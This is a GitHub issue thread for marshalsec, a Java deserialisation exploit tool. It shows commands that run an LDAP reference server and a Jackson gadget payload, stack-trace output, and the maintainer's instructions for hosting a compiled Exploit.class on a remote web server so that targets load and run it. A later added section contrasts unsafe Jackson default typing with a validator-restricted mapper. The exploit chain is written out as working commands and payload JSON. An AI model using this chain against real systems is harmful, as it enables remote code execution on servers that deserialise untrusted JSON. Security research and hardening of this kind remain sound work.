mbechler / marshalsec

MIT License

Unclear instructions for LDAP #1

Closed jasinner closed 7 years ago

jasinner commented 7 years ago

Nice work @mbechler, thank you! I was trying to get the Jackson exploit to work with an LDAP remote codebase. I see you have an example LDAPServer which we can use, but I'm not sure what to use as the argument when starting to make the Jackson Marshal work. Can you give more details for that?

Here's what I tried:

Terminal 1:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer file://marshalsec.gadgets#JdbcRowSet

Output:

Listening on 0.0.0.0:1389

Terminal 2:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -v -t SpringAbstractBeanFactoryPointcutAdvisor ldap://localhost:1389

Output:

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389"]}],"adviceBeanName":"ldap://localhost:1389"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]

Running gadget SpringAbstractBeanFactoryPointcutAdvisor:
Failed to achieve RCE:Did not trigger RCE
org.springframework.beans.factory.BeanNotOfRequiredTypeException: Bean named 'ldap://localhost:1389' is expected to be of type 'org.aopalliance.aop.Advice' but was actually of type 'com.sun.jndi.ldap.LdapCtx'
    at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:122)
...
com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:63)
    at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:3789)
    at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:2833)
    at marshalsec.Jackson.unmarshal(Jackson.java:78)
    at marshalsec.Jackson.unmarshal(Jackson.java:53)
    at marshalsec.MarshallerBase.test(MarshallerBase.java:238)
    at marshalsec.MarshallerBase.doRun(MarshallerBase.java:188)
    at marshalsec.MarshallerBase.run(MarshallerBase.java:121)
    at marshalsec.Jackson.main(Jackson.java:262)

mbechler commented 7 years ago

The flow essentially is:

You'll also need a webserver running somewhere hosting the code you ultimately want to execute.

E.g. Exploit.java

public class Exploit {

    // Static initializer: runs as soon as the class is loaded, no instance required
    static {
        System.err.println("Pwned");
        try {
            // trigger an access check so that the test sees this has been executed
            String user = System.getProperty("user.name");
        } catch ( Exception e ) {
        }
    }
}

Compile that with javac Exploit.java and put it on that webserver. Let's say that it is now accessible (from the exploitation target) as http://192.0.2.1/foo/Exploit.class; then you would run the LDAPRefServer as

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.0.2.1/foo/#Exploit

Hope that clears it up.
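The chain above only gets as far as the JNDI lookup because the target's ObjectMapper has default typing enabled, so the ["java.util.HashSet", ...] array form lets the JSON name SimpleJndiBeanFactory and hand it the ldap:// name. As an added illustration (not part of this thread or of marshalsec), here is that weak configuration beside the Jackson 2.10+ form that refuses the same payload at type-id resolution; the allow-listed package name com.example.model is an assumption.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingDemo {

    // The gadget JSON emitted by marshalsec.Jackson in the thread above (constructed copy).
    static final String PAYLOAD =
        "[\"java.util.HashSet\",[[\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\","
      + "{\"beanFactory\":[\"org.springframework.jndi.support.SimpleJndiBeanFactory\","
      + "{\"shareableResources\":[\"ldap://localhost:1389\"]}],"
      + "\"adviceBeanName\":\"ldap://localhost:1389\"}],"
      + "[\"org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor\",{}]]]";

    // Weak: legacy global default typing. Every class name in the JSON is resolved and
    // instantiated, so SimpleJndiBeanFactory gets created and performs the JNDI lookup.
    static ObjectMapper unsafeMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); // deprecated since 2.10
        return m;
    }

    // Corrected (Jackson 2.10+): type ids are honoured only for subtypes under an
    // allow-listed package (assumed name "com.example.model"); all others are refused.
    static ObjectMapper restrictedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")
            .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    // True when the mapper refuses the payload at type-id resolution, i.e. before any
    // gadget class is instantiated and before any JNDI name is ever looked up.
    static boolean rejectsPayload(ObjectMapper mapper) {
        try {
            mapper.readValue(PAYLOAD, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;   // "... PolymorphicTypeValidator ... denied resolution"
        } catch (Exception e) {
            return false;  // some other failure, not a type-id rejection
        }
    }
}
```

Calling rejectsPayload(restrictedMapper()) needs only jackson-databind on the classpath: the validator denies java.util.HashSet before the Spring gadget classes are ever touched, so the same JSON that triggers the JNDI lookup with unsafeMapper() is stopped at the first type id.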

jasinner commented 7 years ago

Great, thanks. I got the C3P0 exploit to work with this setup.